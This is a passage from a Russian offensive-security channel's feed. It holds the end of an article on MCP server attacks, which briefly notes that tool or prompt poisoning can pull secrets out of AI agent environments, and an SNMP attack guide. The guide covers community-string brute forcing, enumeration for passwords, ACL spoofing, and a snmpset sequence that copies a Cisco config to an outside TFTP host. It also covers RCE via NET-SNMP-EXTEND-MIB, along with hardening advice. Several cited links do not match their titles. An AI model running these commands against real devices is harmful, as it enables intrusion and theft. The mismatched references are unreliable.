  <h2 id="O0IS">Заключение и материалы для чтения</h2>
  <p id="8Him">MCP-сервер — это просто ещё один сетевой интерфейс между вашим приложением и внутренними ресурсами. Он даёт огромную гибкость ИИ-агентам, но одновременно открывает новые варианты старых атак: SSRF, LFI, RCE, утечку токенов и конфигов. Исследования Knostic, Kulkan Security, Invariant Labs, Veria Labs, Oligo Security и других команд уже показывают, что:</p>
  <ul id="dVKb">
    <li id="619Z">сотни и тысячи MCP-серверов доступны в интернете без аутентификации;(<a href="https://www.prweb.com/releases/knostics-ai-security-research-unveiled-1-862-exposed-mcp-servers-lack-essential-security-measures-302512722.html" target="_blank">PRWeb</a>)</li>
    <li id="dpos">ошибки в OAuth/CORS и dev-инструментах легко приводят к RCE на машинах разработчиков;(<a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" target="_blank">oligo.security</a>)</li>
    <li id="x5Q1">tool/prompt/schema poisoning позволяет незаметно вытащить ключи, конфиги и чувствительные документы из среды разработчика и из продакшена.(<a href="https://www.reddit.com/r/cursor/comments/1jqf1u5/mcp_is_awesome_until_it_steals_your_secrets/" target="_blank">Reddit</a>)</li>
  </ul>
  <p id="iIke">В этой первой части мы сосредоточились на базовых вещах: как поднять DVMCP, как использовать MCP-Scanner для разведки, как руками проверять SSRF/LFI/IDOR/RCE.</p>
  <p id="PkJW">Во второй части логично перейти к более сложным сюжетам:</p>
  <ul id="QYI9">
    <li id="SYzP">tool/prompt/full-schema poisoning;</li>
    <li id="5EWY">цепочки атак через IDE и dev-инструменты;</li>
    <li id="9BGt">методики hardening и интеграция сканеров/политик (включая платформы уровня Tencent AI-Infra-Guard) в SDLC.</li>
  </ul>
  <p id="7ne0">Для самостоятельного углубления сейчас стоит посмотреть:</p>
  <ul id="HTQQ">
    <li id="ZKv0"><strong>Knostic / ModelContextProtocol-Security:</strong> обзор открытых MCP-серверов и статистика по аутентификации.(<a href="https://www.prweb.com/releases/knostics-ai-security-research-unveiled-1-862-exposed-mcp-servers-lack-essential-security-measures-302512722.html" target="_blank">PRWeb</a>)</li>
    <li id="Gkkj"><strong>Kulkan Security — “Assessing the Attack Surface of Remote MCP Servers”.</strong>(<a href="https://medium.com/%2540ibm_ptc_security/dom-clobbering-baa55c208bce" target="_blank">Medium</a>)</li>
    <li id="itTl"><strong>Invariant Labs — “MCP Security Notification: Tool Poisoning Attacks”.</strong>(<a href="https://www.reddit.com/r/cursor/comments/1jqf1u5/mcp_is_awesome_until_it_steals_your_secrets/" target="_blank">Reddit</a>)</li>
    <li id="F6tO"><strong>Veria Labs — “From MCP to Shell: How MCP Authentication Flaws Enable RCE in Claude Code, Gemini CLI, and More”.</strong>(<a href="https://previouslyontech.com/p/data-centers-in-space" target="_blank">Previously on Tech</a>)</li>
    <li id="xnBm"><strong>Oligo Security / Qubit — материалы по RCE в Anthropic MCP Inspector (CVE-2025-49596, CVE-2025-58444).</strong>(<a href="https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596" target="_blank">oligo.security</a>)</li>
  </ul>
  <p id="Xjja">Этого достаточно, чтобы не относиться к MCP как к «чёрному ящику с ИИ-магией», а видеть в нём то, чем он реально является: мощный, но крайне чувствительный интерфейс между моделью и вашей инфраструктурой. Именно такие вещи исторически и ломают чаще всего.<br /><br /><u>Лев Прокопьев, эксперт по наступательной кибербезопасности<br /><br />Материал подготовлен специально для сообщества <a href="https://t.me/ad_poheque" target="_blank">AD_POHEQUE</a></u></p>
  <p id="fdB0"><a href="https://t.me/ad_poheque" target="_blank">👾</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@ad_poheque/hacking_SNMP</guid><link>https://teletype.in/@ad_poheque/hacking_SNMP?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque</link><comments>https://teletype.in/@ad_poheque/hacking_SNMP?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=ad_poheque#comments</comments><dc:creator>ad_poheque</dc:creator><title>Атаки на SNMP (Simple Network Management Protocol)</title><pubDate>Fri, 05 Dec 2025 16:02:59 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/7e/71/7e717c1a-0872-438a-af3c-3383a67a5fe6.png"></media:content><description><![CDATA[<img src="https://book.hacktricks.wiki/en/images/SNMP_OID_MIB_Tree%20(1).png"></img>SNMP (Simple Network Management Protocol) — протокол, который используют для мониторинга разных устройств в сети (роутеры, свитчи, принтеры, IoT и т.п.).]]></description><content:encoded><![CDATA[
  <h2 id="anwk">Базовая информация</h2>
  <p id="8anB"><strong>SNMP (Simple Network Management Protocol)</strong> — протокол, который используют для мониторинга разных устройств в сети (роутеры, свитчи, принтеры, IoT и т.п.).</p>
  <p id="jEfp">Пример баннера:</p>
  <pre id="adfI">PORT    STATE SERVICE REASON                 VERSION
161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)
</pre>
  <blockquote id="66C0"><strong>Совет</strong><br /> SNMP также использует порт <strong>162/UDP</strong> для <strong>traps</strong>.<br /> Traps — это <strong>пакеты данных, которые сервер SNMP отправляет клиенту без явного запроса</strong> с его стороны.</blockquote>
  <hr />
  <h3 id="kbd9">MIB</h3>
  <p id="6rWf">Чтобы SNMP нормально работал между разными вендорами и разными связками клиент–сервер, придумали <strong>MIB (Management Information Base)</strong>.</p>
  <p id="7JEY"><strong>MIB — это независимый формат хранения информации об устройстве.</strong><br /> Фактически это <strong>текстовый файл</strong>, в котором все доступные для опроса <strong>SNMP-объекты</strong> конкретного устройства перечислены в виде <strong>стандартизированного древовидного дерева</strong>.</p>
  <p id="qjew">Каждый MIB содержит как минимум один <strong>Object Identifier (OID)</strong>, который, кроме <strong>уникального адреса</strong> и <strong>имени</strong>, описывает:</p>
  <ul id="Yq7C">
    <li id="tF4y">тип объекта,</li>
    <li id="jNnS">права доступа,</li>
    <li id="YCCc">текстовое описание.</li>
  </ul>
  <p id="mlbh">Файлы MIB пишутся на основе <code>ASN.1</code> (Abstract Syntax Notation One) в ASCII-тексте.<br /> <strong>Сами MIB-файлы не содержат данных</strong>. Они описывают:</p>
  <ul id="g8ll">
    <li id="RSZA"><strong>где</strong> именно искать нужную информацию;</li>
    <li id="uRli"><strong>какой</strong> тип данных там лежит;</li>
    <li id="Q8oq"><strong>какие значения</strong> может возвращать конкретный OID.</li>
  </ul>
  <hr />
  <h3 id="GHiS">OIDs</h3>
  <p id="RXEH"><strong>OIDs (Object Identifiers)</strong> — ключевой элемент. Это <strong>уникальные идентификаторы управляемых объектов</strong> внутри <strong>MIB</strong>.</p>
  <p id="00Mw">Верхние уровни дерева OID выделены под разные стандартизирующие организации.<br /> Именно там задаётся каркас общих стандартов и практик управления.</p>
  <p id="vdoD">Дальше у вендоров есть свои <strong>частные ветки</strong>. В этих ветках производитель может:</p>
  <ul id="hytt">
    <li id="9Jnx">создавать свои объекты управления;</li>
    <li id="RJUo">описывать параметры, характерные именно для <strong>его</strong> железа и продуктов.</li>
  </ul>
  <p id="3I3u">Так получается единая, но расширяемая система идентификации и управления объектами.</p>
  <figure id="0QxG" class="m_original">
    <img src="https://book.hacktricks.wiki/en/images/SNMP_OID_MIB_Tree%20(1).png" width="704" />
  </figure>
  <p id="3lG5">Навигировать по <strong>OID-дереву</strong> можно прямо в браузере, например:</p>
  <ul id="NGen">
    <li id="7eoK">дерево: <a href="http://www.oid-info.com/cgi-bin/display?tree=#focus" target="_blank">http://www.oid-info.com/cgi-bin/display?tree=#focus</a></li>
    <li id="7S9T">расшифровка конкретного OID (например, <code>1.3.6.1.2.1.1</code>):<br /> <a href="http://oid-info.com/get/1.3.6.1.2.1.1" target="_blank">http://oid-info.com/get/1.3.6.1.2.1.1</a></li>
  </ul>
  <p id="6tKg">Есть <strong>известные OID’ы</strong>, например ветка <a href="http://oid-info.com/get/1.3.6.1.2.1" target="_blank">1.3.6.1.2.1</a> — это MIB-2, где определены стандартные SNMP-переменные.<br /> Из <strong>дочерних OID этой ветки</strong> можно получить кучу интересной информации о хосте: системные данные, сетевые интерфейсы, процессы и т.д.</p>
  <hr />
  <h3 id="kkVR">Пример OID</h3>
  <p id="HXBd"><a href="https://www.netadmintools.com/snmp-mib-and-oids/" target="_blank">Пример отсюда</a>:</p>
  <p id="VRTn"><strong><code>1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3 . 21 . 1 . 4 . 7</code></strong></p>
  <p id="mKhQ">Разберём по частям:</p>
  <ul id="uQjm">
    <li id="hsn9"><code>1</code> — <strong>ISO</strong>, признак того, что это вообще OID. Поэтому все OID начинаются с <code>1</code>.</li>
    <li id="1pGz"><code>3</code> — <strong>ORG</strong>, указывает организацию, связанную с объектом.</li>
    <li id="wLjK"><code>6</code> — <strong>dod</strong> (Department of Defense) — исторически организация, стоявшая у истоков Интернета.</li>
    <li id="Hkq1"><code>1</code> — значение <strong>internet</strong>, то есть пространство имён Интернета.</li>
    <li id="flF7"><code>4</code> — ветка, показывающая, что устройство относится к <strong>частной организации</strong>, а не государству.</li>
    <li id="7CHj"><code>1</code> — ветка <strong>enterprise</strong>, то есть объект принадлежит какому-то бизнесу или компании.</li>
  </ul>
  <p id="H4i9">Эти первые шесть чисел почти всегда одинаковые и дают базовую информацию.<br /> Дальше начинаются более конкретные данные.</p>
  <p id="CETx">Следующий блок:</p>
  <ul id="ddVJ">
    <li id="4xBT"><code>1452</code> — идентификатор организации-производителя устройства.</li>
    <li id="X5VX"><code>1</code> — тип устройства. В примере — будильник.</li>
    <li id="12sH"><code>2</code> — признак того, что это <strong>remote terminal unit</strong>.</li>
  </ul>
  <p id="BTAY">Остаток OID даёт уже совсем специфичную инфу:</p>
  <ul id="aXzR">
    <li id="zKkq"><code>5</code> — дискретная точка тревоги;</li>
    <li id="b120"><code>1</code> — конкретная точка внутри устройства;</li>
    <li id="91AG"><code>3</code> — порт;</li>
    <li id="6MnW"><code>21</code> — адрес порта;</li>
    <li id="EyAY"><code>1</code> — дисплей, связанный с портом;</li>
    <li id="VhMr"><code>4</code> — номер точки;</li>
    <li id="btBU"><code>7</code> — состояние точки.</li>
  </ul>
  <hr />
  <h3 id="kM2E">Версии SNMP</h3>
  <p id="I4Ok">Из практических версий нас интересуют:</p>
  <ul id="cpCl">
    <li id="3gEH"><strong>SNMPv1</strong><br /> Самая старая и до сих пор очень распространённая.<br /> <strong>Аутентификация — через строку (community string)</strong>, которая передаётся <strong>в открытом виде</strong>, как и все данные.<br /> <strong>SNMPv2 / v2c</strong> тоже передают всё <strong>в plain-text</strong> и используют <strong>community string</strong>.</li>
    <li id="0pDM"><strong>SNMPv3</strong><br /> Использует более серьёзную схему <strong>аутентификации</strong>, а данные передаёт <strong>в зашифрованном виде</strong>.<br /> Теоретически возможна <strong>словесная (dictionary) атака</strong>, но подобрать учётку гораздо сложнее, чем у v1/v2c.</li>
  </ul>
  <hr />
  <h3 id="9zks">Community Strings</h3>
  <p id="K00P">Как уже было сказано, <strong>для доступа к данным MIB в SNMPv1 и v2/2c нужно знать community string, а в SNMPv3 — логин/пароль (и параметры безопасности)</strong>.</p>
  <p id="yOLG">Есть два основных типа community string:</p>
  <ul id="d5nF">
    <li id="eMiG"><strong><code>public</code></strong> — обычно даёт <strong>только чтение (read-only)</strong>;</li>
    <li id="phXV"><strong><code>private</code></strong> — как правило, <strong>чтение/запись (read-write)</strong>.</li>
  </ul>
  <p id="8mQv">Важно: <strong>возможность записи по конкретному OID зависит от использованной community string</strong>, поэтому даже если у вас есть только <code>public</code>,<br /> вполне возможно, что <strong>некоторые значения всё же можно менять</strong>.<br /> Плюс есть объекты, которые <strong>всегда только на чтение</strong>.</p>
  <p id="hKAn">Если попытаться <strong>записать</strong> значение в объект, для которого это запрещено, вы получите ошибку <code>noSuchName</code> или <code>readOnly</code>.</p>
  <p id="1lRG">В SNMP v1/v2/2c при <strong>неверной</strong> community string сервер просто <strong>не отвечает</strong>.<br /> То есть если SNMP ответил — community string была <strong>валидной</strong>.</p>
  <hr />
  <h2 id="H0c0">Порты</h2>
  <p id="2yQF"><a href="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol" target="_blank">По данным Wikipedia</a>:</p>
  <ul id="vSwa">
    <li id="Qrms">Агент SNMP принимает запросы на UDP-порт <strong>161</strong>.</li>
    <li id="w5Ei">Менеджер получает уведомления (<a href="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap" target="_blank">Traps</a> и <a href="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest" target="_blank">InformRequests</a>) на порт <strong>162</strong>.</li>
    <li id="8Os2">При использовании <a href="https://en.wikipedia.org/wiki/Transport_Layer_Security" target="_blank">TLS</a> или <a href="https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security" target="_blank">DTLS</a>:</li>
    <ul id="Irjn">
      <li id="f3Y1">запросы принимаются на <strong>10161</strong>,</li>
      <li id="hLyn">уведомления отправляются на <strong>10162</strong>.</li>
    </ul>
  </ul>
  <hr />
  <h2 id="ztim">Брутфорс community string (v1 и v2c)</h2>
  <p id="IBop">Чтобы <strong>подобрать community string</strong>, используется словарная атака.<br /> Разные способы брутфорса SNMP описаны здесь:<br /> <a href="https://book.hacktricks.wiki/en/generic-hacking/brute-force.html#snmp" target="_blank">https://book.hacktricks.wiki/en/generic-hacking/brute-force.html#snmp</a></p>
  <p id="6qme">Часто встречающаяся строка — <strong><code>public</code></strong>.</p>
  <hr />
  <h2 id="aIfd">Перечисление SNMP</h2>
  <p id="EN1a">Чтобы <strong>понять, что означает каждый OID</strong>, имеет смысл подтянуть MIB-ы:</p>
  <pre id="NRq4">apt-get install snmp-mibs-downloader download-mibs

# потом закомментировать строку &quot;mibs :&quot; в /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
</pre>
  <p id="B8XM">Дальше, зная корректную community string, можно ходить в SNMP с помощью <strong>snmpwalk / snmpbulkwalk</strong> или <strong>snmp-check</strong>:</p>
  <pre id="nUGh"># Массовый обход дерева (важна финальная точка!)
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] .
snmpbulkwalk -c public -v2c 10.10.11.136 .

# Обычный обход
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [IP]

# Получить IPv6 (нужен dec2hex)
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [IP] 1.3.6.1.2.1.4.34.1.3

# Расширенные объекты
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [IP] NET-SNMP-EXTEND-MIB::nsExtendObjects

# Полное перечисление
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [IP] .1

# Быстрый аудит
snmp-check [IP] -p [PORT] -c [COMM_STRING]

# Nmap-скрипты
nmap --script &quot;snmp* and not snmp-brute&quot; &lt;target&gt;

# Брут конкретного диапазона OID
braa &lt;community string&gt;@&lt;IP&gt;:.1.3.6.*
</pre>
  <p id="HXJE">Благодаря extended-запросам (и загруженным MIB-ам) можно вытащить ещё больше системной информации:</p>
  <pre id="zBGg">snmpwalk -v X -c public &lt;IP&gt; NET-SNMP-EXTEND-MIB::nsExtendOutputFull
</pre>
  <p id="JMpA">Через <strong>SNMP</strong> часто удаётся собрать очень много данных о хосте. Особенно интересны:</p>
  <ul id="EOlp">
    <li id="7eUa"><strong>сетевые интерфейсы</strong> (включая <strong>IPv6</strong>);</li>
    <li id="l9pr">имена пользователей;</li>
    <li id="COX6">аптайм;</li>
    <li id="4HmA">версия ОС/сервера;</li>
    <li id="yFx9"><strong>запущенные процессы</strong> (иногда прямо с паролями в аргументах).</li>
  </ul>
  <hr />
  <h3 id="Zn10">Опасные настройки</h3>
  <p id="ltyk">Некоторые параметры SNMP в контексте безопасности особенно критичны — они отвечают за доступ к <strong>полной OID-иерархии</strong>.</p>
  <h4 id="nfgK">Настройки доступа</h4>
  <p id="yol2">Есть две ключевые настройки, которые могут дать <strong>полный доступ ко всему OID-дереву</strong>:</p>
  <ol id="Oxbp">
    <li id="q5r1"><strong><code>rwuser noauth</code></strong><br /> Разрешает полное RW-доступ к дереву OID <strong>без аутентификации</strong>.<br /> Прямой и очень опасный вариант.</li>
    <li id="2s7g">Более точечный подход — через:</li>
    <ul id="qnwE">
      <li id="suwA"><strong><code>rwcommunity</code></strong> для <strong>IPv4</strong>,</li>
      <li id="3io3"><strong><code>rwcommunity6</code></strong> для <strong>IPv6</strong>.</li>
    </ul>
  </ol>
  <p id="u7s8">Обе команды требуют указать <strong>community string</strong> и IP-адрес (или маску).<br /> Результат — <strong>полный доступ</strong>, независимо от источника запроса, если он подходит под правило.</p>
  <hr />
  <h3 id="wqnk">SNMP-параметры для Microsoft Windows</h3>
  <p id="kJuO">Через SNMP на Windows можно мониторить разные вещи по конкретным MIB-значениям:</p>
  <ul id="oI6k">
    <li id="3k2e"><strong>Системные процессы</strong> — <code>1.3.6.1.2.1.25.1.6.0</code><br /> Позволяет смотреть количество активных процессов.</li>
    <li id="GWlE"><strong>Запущенные программы</strong> — <code>1.3.6.1.2.1.25.4.2.1.2</code></li>
    <li id="0Scd"><strong>Путь к процессу</strong> — <code>1.3.6.1.2.1.25.4.2.1.4</code></li>
    <li id="ttEw"><strong>Носители/хранилища</strong> — <code>1.3.6.1.2.1.25.2.3.1.4</code></li>
    <li id="hGaR"><strong>Имя установленного ПО</strong> — <code>1.3.6.1.2.1.25.6.3.1.2</code></li>
    <li id="Yu8C"><strong>Учётные записи пользователей</strong> — <code>1.3.6.1.4.1.77.1.2.25</code></li>
    <li id="s8Ad"><strong>Локальные TCP-порты</strong> — <code>1.3.6.1.2.1.6.13.1.3</code></li>
  </ul>
  <hr />
  <h3 id="kHvg">Массовый SNMP-скан</h3>
  <p id="JEUN"><a href="https://github.com/mteg/braa" target="_blank">Braa</a> — массовый SNMP-сканер.</p>
  <p id="WI44">В отличие от <code>snmpwalk</code> из net-snmp, Braa может:</p>
  <ul id="HWHL">
    <li id="FGK3">опрашивать десятки и сотни хостов <strong>одновременно</strong>;</li>
    <li id="PYk5">работать одним процессом;</li>
    <li id="4Qcz">потреблять очень мало ресурсов и сканировать <strong>очень быстро</strong>.</li>
  </ul>
  <p id="R8RK">У Braa <strong>свой собственный SNMP-стек</strong>, поэтому ему <strong>не нужны внешние библиотеки</strong>.</p>
  <p id="L1Hf"><strong>Синтаксис:</strong></p>
  <pre id="8Y4j">braa [community]@[IP_SNMP_сервера]:[iso id]

braa ignite123@192.168.1.125:.1.3.6.*
</pre>
  <p id="vRF5">На выходе вы получите очень много данных (мегабайты), которые руками не разобрать.<br /> Поэтому дальше выдираем самое интересное. Ниже — приёмчики из:<br /> <a href="https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/" target="_blank">https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/</a></p>
  <hr />
  <h3 id="gJtf">Устройства</h3>
  <p id="9RYF">Сначала определяем типы устройств с помощью <code>sysDesc</code>:</p>
  <ul id="CTDG">
    <li id="34MB">OID: <code>1.3.6.1.2.1.1.1.0</code></li>
  </ul>
  <p id="oxGu">По файлам <code>.snmp</code> можно пройтись:</p>
  <pre id="GPaI">grep &quot;.1.3.6.1.2.1.1.1.0&quot; *.snmp
</pre>
  <hr />
  <h3 id="oFxv">Поиск private-строки</h3>
  <p id="RWbC">Задача — найти <strong>private community string</strong>, особенно на Cisco IOS, чтобы:</p>
  <ul id="mVbP">
    <li id="33nL">сливать <strong>running-config</strong>,</li>
    <li id="Ja8C">или другие чувствительные настройки.</li>
  </ul>
  <p id="xKxE">Иногда нужные строки всплывают в <strong>trap-логах</strong>. Тогда ищем слово <code>trap</code>:</p>
  <pre id="gM2d">grep -i &quot;trap&quot; *.snmp
</pre>
  <hr />
  <h3 id="hzZN">Usernames / Passwords</h3>
  <p id="eqHe">В MIB-таблицах могут лежать <strong>логи неуспешных логинов</strong>.<br /> Иногда пользователи случайно забивают пароли в поле username — и это улетает в лог.</p>
  <p id="R3Ow">Ищем по ключевым словам:</p>
  <pre id="hrvF">grep -i &quot;login\|fail&quot; *.snmp
</pre>
  <hr />
  <h3 id="Kz8l">Email-адреса</h3>
  <p id="FCfS">Извлечь email-ы можно через <code>grep</code> с regexp:</p>
  <pre id="hV2H">grep -E -o &quot;\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b&quot; *.snmp
</pre>
  <hr />
  <h2 id="Plx4">Изменение значений SNMP</h2>
  <p id="lxTH">Для <strong>изменения значений</strong> можно использовать, например, <strong>NetScanTools</strong>.<br /> Для этого нужно знать <strong>private community string</strong>.</p>
  <hr />
  <h2 id="rXai">Спуфинг</h2>
  <p id="7O9H">Если доступ к SNMP ограничен ACL и разрешены только определённые IP, можно:</p>
  <ul id="NfHP">
    <li id="Bat7">подделать (spoof) один из разрешённых адресов в UDP-пакетах,</li>
    <li id="daC9">и параллельно <strong>снифать ответы</strong>, чтобы всё равно получить данные.</li>
  </ul>
  <hr />
  <h2 id="DsAs">Проверка конфигов SNMP</h2>
  <p id="zUgH">Типичные файлы конфигурации:</p>
  <ul id="ZPiX">
    <li id="2B5E"><code>snmp.conf</code></li>
    <li id="ERhP"><code>snmpd.conf</code></li>
    <li id="siw9"><code>snmp-config.xml</code></li>
  </ul>
  <hr />
  <h1 id="krN4">Cisco SNMP</h1>
  <h2 id="IWWi">Тестирование Cisco-сетей</h2>
  <p id="Whg1"><strong>SNMP</strong> у Cisco работает по UDP:</p>
  <ul id="BdbL">
    <li id="mbJG"><strong>161/UDP</strong> — обычные запросы/ответы;</li>
    <li id="Dy8u"><strong>162/UDP</strong> — trap-сообщения.</li>
  </ul>
  <p id="RUgQ">Протокол опирается на <strong>community strings</strong> — это по сути «пароли» в открытом виде, определяющие:</p>
  <ul id="v6ie">
    <li id="yCLf">уровень доступа: <strong>RO (read-only)</strong> или <strong>RW (read-write)</strong>;</li>
    <li id="kcov">кто может управлять устройством.</li>
  </ul>
  <p id="9r4Z">Классический (и до сих пор эффективный) вектор — <strong>подбор community string</strong>,<br /> чтобы с анонимного уровня подняться до админского RW-доступа.</p>
  <p id="PET3">Удобный инструмент:</p>
  <ul id="dS2v">
    <li id="4fpN"><a href="https://github.com/trailofbits/onesixtyone" target="_blank"><strong>onesixtyone</strong></a></li>
  </ul>
  <pre id="sxSW">onesixtyone -c community_strings.txt -i targets.txt
</pre>
  <p id="166J">Другие быстрые варианты:</p>
  <pre id="kOwa"># Nmap NSE
nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24

# Hydra
hydra -P wordlist.txt -s 161 10.10.10.1 snmp
</pre>
  <hr />
  <h3 id="L3L5">Дамп конфига через SNMP (CISCO-CONFIG-COPY-MIB)</h3>
  <p id="GBFz">Если у вас есть <strong>RW-community</strong>, можно слить <code>running-config</code> / <code>startup-config</code><br /> на TFTP/FTP-сервер <strong>без доступа к CLI</strong>, злоупотребляя MIB <code>CISCO-CONFIG-COPY-MIB</code> (<code>1.3.6.1.4.1.9.9.96</code>).</p>
  <p id="Rv13">Два основных пути:</p>
  <ol id="nPbo">
    <li id="ebGe"><strong>Nmap NSE — <code>snmp-ios-config</code></strong></li>
  </ol>
  <pre id="w2DR">nmap -sU -p161 --script snmp-ios-config \
     --script-args creds.snmp=private 192.168.66.1
</pre>
  <p id="Sem2">Скрипт сам организует копирование и напечатает конфиг в stdout.</p>
  <ol id="XY6Z">
    <li id="CiHW"><strong>Ручная последовательность <code>snmpset</code></strong></li>
  </ol>
  <pre id="gzn7"># Копируем running-config (4) на TFTP-сервер (1), row id = 1234
snmpset -v2c -c private 192.168.66.1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \
    # protocol = tftp
  1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \
    # sourceFileType = runningConfig
  1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \
    # destFileType = networkFile
  1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \
    # TFTP server IP
  1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s &quot;backup.cfg&quot; \
  1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4
    # rowStatus = createAndGo
</pre>
  <p id="2rN1">Обрати внимание: <strong>row id одноразовый</strong> — повторное использование в течение ~5 минут даст <code>inconsistentValue</code>.</p>
  <p id="aA3J">Когда конфиг уже лежит на TFTP-сервере, его можно:</p>
  <ul id="WSmD">
    <li id="Zwir">просмотреть на предмет паролей (<code>enable secret</code>, <code>username &lt;user&gt; secret</code> и т.п.),</li>
    <li id="TT9e">или даже подготовить <strong>модифицированный конфиг</strong> и залить его обратно.</li>
  </ul>
  <hr />
  <h3 id="FL4o">Полезное в Metasploit</h3>
  <ul id="YdRY">
    <li id="lKMS"><strong><code>cisco_config_tftp</code></strong> — скачивает running/startup-config через TFTP, используя тот же MIB.</li>
    <li id="6HPQ"><strong><code>snmp_enum</code></strong> — собирает инвентаризационные данные: информацию об устройстве, VLAN’ы, описания интерфейсов, ARP-таблицу и т.д.</li>
  </ul>
  <p id="G8ZE">Пример:</p>
  <pre id="c2ul">use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run
</pre>
  <hr />
  <h2 id="nxLp">Свежие уязвимости Cisco SNMP (2023–2025)</h2>
  <p id="FqbY">Следить за вендорскими advisory полезно, чтобы находить <strong>“0-day → n-day”</strong> возможности в рамках пентеста.</p>
  <p id="T0bw">Год CVE Компонент Влияние     2025 CVE-2025-20174 SNMP subsystem Специальный пакет приводит к <strong>аутентифицированному DoS</strong> (reload) на IOS/IOS-XE (v1/v2c/v3).   2024 CVE-2024-20373 IPv4 ACL handling Некорректно настроенные <strong>extended ACL</strong> могут <strong>тихо проваливаться</strong>, позволяя неаутентифицированные SNMP-опросы при известной community/user.   2025 (без CVE пока) SNMPv3 restriction bypass Пользователь SNMPv3 может опрашивать устройство с адресов, которые должны быть запрещены.</p>
  <p id="lpLy">Эксплуатация почти всегда требует:</p>
  <ul id="nA0L">
    <li id="jzKZ">знать <strong>community string</strong> или</li>
    <li id="jfrL">иметь <strong>учётку SNMPv3</strong>.</li>
  </ul>
  <p id="VglL">Ещё один аргумент в пользу того, что <strong>брутфорс SNMP всё ещё актуален</strong>.</p>
  <hr />
  <h2 id="1u8B">Hardening и детекция</h2>
  <ul id="UUlM">
    <li id="d3i8">Обновиться до исправленной версии IOS/IOS-XE (см. advisory Cisco).</li>
    <li id="DAOf">Использовать <strong>SNMPv3</strong> с <code>authPriv</code> (SHA-256 + AES-256) вместо v1/v2c: <code>snmp-server group SECURE v3 priv snmp-server user monitor SECURE v3 auth sha &lt;authpass&gt; priv aes 256 &lt;privpass&gt; </code></li>
    <li id="dIPp">Привязать SNMP к <strong>management VRF</strong> и ограничить доступ <strong>standard IPv4 ACL</strong><br /> (отказаться от extended named ACL из-за CVE-2024-20373).</li>
    <li id="78Vr">Отключить <strong>RW-community</strong>.<br /> Если без них никак — жёстко ограничить по ACL и по views: <code>snmp-server community &lt;string&gt; RW 99 view SysView </code></li>
    <li id="uP3q">Мониторить:</li>
    <ul id="Diy3">
      <li id="OWCv">всплески UDP/161,</li>
      <li id="kxwa">неожиданные источники запросов (правила в SIEM).</li>
      <li id="jgLx">события <code>CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource</code> — признак изменений конфига помимо стандартных каналов.</li>
    </ul>
    <li id="4hiC">Включить логирование SNMPv3 и при необходимости задать: <code>snmp-server packetsize 1500 </code> чтобы уменьшить воздействие некоторых DoS-векторов.</li>
  </ul>
  <hr />
  <h2 id="ok28">Ссылки</h2>
  <ul id="mZfG">
    <li id="Evc2">Cisco: <em>How To Copy Configurations To and From Cisco Devices Using SNMP</em></li>
    <li id="ZEG9">Cisco Security Advisory <em>cisco-sa-snmp-uwBXfqww</em> (CVE-2024-20373)</li>
  </ul>
  <hr />
  <h1 id="glND">SNMP RCE</h1>
  <p id="Sbql">Если админ оставил <strong>SNMP по умолчанию</strong> и дал <strong>запись (rwcommunity)</strong>, это можно использовать для <strong>удалённого выполнения команд</strong> на Linux-сервере.</p>
  <p id="ksgI">Идея: злоумышленник злоупотребляет SNMP-расширениями (<code>NET-SNMP-EXTEND-MIB</code>), чтобы заставить агент <strong>выполнять команды при чтении OID</strong>.</p>
  <hr />
  <h2 id="BCX3">Расширение сервиса дополнительными командами</h2>
  <p id="Ol8g">Можно добавить новые команды в SNMP, создав строки в таблице <strong><code>nsExtendObjects</code></strong>.</p>
  <p id="bLxK">Пример с <code>snmpset</code>:</p>
  <pre id="yBgV">snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
  &#x27;nsExtendStatus.&quot;evilcommand&quot;&#x27; = createAndGo \
  &#x27;nsExtendCommand.&quot;evilcommand&quot;&#x27; = /bin/echo \
  &#x27;nsExtendArgs.&quot;evilcommand&quot;&#x27; = &#x27;hello world&#x27;
</pre>
  <p id="1KPH">Здесь мы:</p>
  <ul id="D4mu">
    <li id="PjbM">создаём объект <code>evilcommand</code>,</li>
    <li id="AsR7">задаём команду <code>/bin/echo</code>,</li>
    <li id="r3R5">передаём аргументы <code>hello world</code>.</li>
  </ul>
  <hr />
  <h2 id="hCRf">Инъекция команд для выполнения</h2>
  <p id="NkbP">Для запуска команды через <code>NET-SNMP-EXTEND-MIB</code> нужно:</p>
  <ul id="Cwj4">
    <li id="w3lm">указывать <strong>абсолютный путь</strong> к бинарнику/скрипту;</li>
    <li id="5DP9">убедиться, что он существует и исполняем.</li>
  </ul>
  <p id="v9VZ">Проверить, что команда записалась, можно через <code>snmpwalk</code>:</p>
